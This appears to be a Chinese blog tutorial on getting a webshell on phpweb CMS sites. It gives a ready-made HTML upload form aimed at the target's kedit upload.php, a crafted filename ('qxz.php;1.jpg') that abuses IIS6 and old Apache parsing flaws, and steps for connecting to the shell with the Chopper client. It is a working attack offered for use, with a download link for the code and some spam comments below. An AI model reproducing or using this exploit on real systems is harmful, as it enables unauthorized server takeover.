phpweb后台拿shell简单方法

关于phpweb后台拿shell简单方法。
 
首先登录后台admin.php
phpweb
 
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。 
 
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
 
然后选择你的马儿再上传
0131203233947
 
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
 
203233848
 

 
菜刀链接看下
 
t234952
 
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
 
代码文件下载地址:http://pan.baidu.com/s/1eRzHs

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/4117.html

phpweb后台拿shell简单方法:目前有4 条留言

  1. 板凳
    新巧:

    非常高兴遇到这么好的文章 谢谢

    2015-12-14 15:57 [回复]
  2. 沙发
    耐火材料浇注料:

    郑州四季火耐火材料有限责任公司www.sijihuo.com 地址:新密耐火材料厂 联系电话:0371-69777737,18336555111

    2015-12-07 15:19 [回复]

发表评论

4 + 1 =

快捷键:Ctrl+Enter